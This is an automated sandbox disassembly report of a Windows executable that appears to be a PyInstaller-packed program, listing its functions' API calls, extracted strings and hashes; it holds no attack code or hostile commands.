                                                                                                                                                                                                                                          • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                          • Instruction ID: 93481a503800abafbd4be4194f86b3e5cce9f863cada2d1c5842c354bea1f4af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D1D326F08A4246E720BF25E8C11B9A351FF847B8FC98175EA0D47695DFBCE849C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction ID: 9d793bcebb9820c0151182275b16c511ee14b60cf496184f33455bab8c33df73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1C1F036B28E428AEB10EFA5C4806AC7761FB49BA8F814275DE1E573D4DF78D059C320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F842B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84AE
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84CD
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84DB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84EC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                          • Instruction ID: 2fa65c9a665bdd242f8f1fa2d4fee73d271b5ebdbec547f78dad87419e254311
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5413D21A0CD5295FB20AF28E4941BAB360FBD4764FC00232ED9D46698EFACD95DC720

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155DC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                          • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                          • Instruction ID: 43560cb39cdfb61ec7095fca75e4095eac9c04942407765997ea7f39760bb279
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18518332B18A4286E710FF21E8C15A9E760FB887A8FC55175EA4D43796DFBCE448C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1010374628-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F7F90: _fread_nolock.LIBCMT ref: 00007FF7124F803A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF7124F1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-1550345328

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F8704
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7124F3CBB), ref: 00007FF7124F870A
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7124F3CBB), ref: 00007FF7124F874C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8830: GetEnvironmentVariableW.KERNEL32(00007FF7124F388E), ref: 00007FF7124F8867
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7124F8889
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712508238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF712508251
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                          • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                          • Instruction ID: 1ed7cfb4f496616f97f87241065266e5ee8a6aee16e0efe9cf3ff2c40058ccc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A419411B19E5254FB20FB2998952B99291AF897F0FC04131ED0D4B7D6EEBCE91DC320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 8268f1b30061614da7bde4472bcd22e6be42c020a5520dbe929a00b884bf6911
                                                                                                                                                                                                                                          • Instruction ID: 66b2bf1aa586a7680bc42a5a2c4e1161d98b0d99462cbac5181fddeb7c46a5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8268f1b30061614da7bde4472bcd22e6be42c020a5520dbe929a00b884bf6911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51D322A08E4241EB21BF15A8803BAA291FFC67A4FC44131ED4D477C5EEBCE959C720

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71250F0AA,?,?,-00000018,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE8C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71250F0AA,?,?,-00000018,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction ID: 6f80c86179e1a5dbb922743ee40829bb654f5e7b51f253034b71fd84d99f8ef8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6411322B09E0281EB15EF16AC80575B291BF48BB0FD84179DD1D47794FEBCE80DD228

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction ID: 71ae712518d8870dd7aabf1224259b029d151d58a96f7cdde2afdbf427693f4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47219A61B1CD4241FB20BB28E8513B6A290BFC8375FC04132DD5D865D5EEACE91CC725

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                          • Instruction ID: dbf2165508bec93022408576bb2ce849e5e57425963a01dc0b1fc0921d9529a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC1732291CE8692E660AF1598C02BDEB50FB81BA0FD54171DA4D07791FEBCE84DC729

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                                          • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                          • Instruction ID: 97166c388e4c5c6ab61f7fe53fbae8dc5d5c2b8cfde78f4d44e46f163325d2f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521F431B0CA4242FB50AB59B58423AE7A0FBC5BF0F900235EA6D477D4EEACD859C710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetCurrentProcess.KERNEL32 ref: 00007FF7124F8590
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: OpenProcessToken.ADVAPI32 ref: 00007FF7124F85A3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetTokenInformation.KERNELBASE ref: 00007FF7124F85C8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetLastError.KERNEL32 ref: 00007FF7124F85D2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: GetTokenInformation.KERNELBASE ref: 00007FF7124F8612
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7124F862E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F8570: CloseHandle.KERNELBASE ref: 00007FF7124F8646
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF7124F3C55), ref: 00007FF7124F916C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF7124F3C55), ref: 00007FF7124F9175
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                          • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                          • Instruction ID: 3f049ae6affc9ec2a5b36b1cabb6348e1b8bef0cc6158d5774a3500f8ee0accb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6213935A08E4282F710BB14E9552EAB261EBC87A0FC44435EE4D43796DFBCE819C7A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7124F352C,?,00000000,00007FF7124F3F23), ref: 00007FF7124F7F32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                          • Instruction ID: 23bc648f564481fa4cb09736bd78cdbf2bd23e8f22d0d805f9d8ee1547dcbdf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131B821719EC145EB21EB15E4507AAA354EBC4BF0F840231EE6D477C5EF6CDA19C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71250CF4B), ref: 00007FF71250D07C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71250CF4B), ref: 00007FF71250D107
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                          • Instruction ID: c30fce92fa661bbfdc522545bb8d72c2ed63180d8c25c96b03adf04e65997356
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A910A32F19E5185F760AF6598C027DABA0FB487A4F944175DE0E53684EFBCD84AC324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
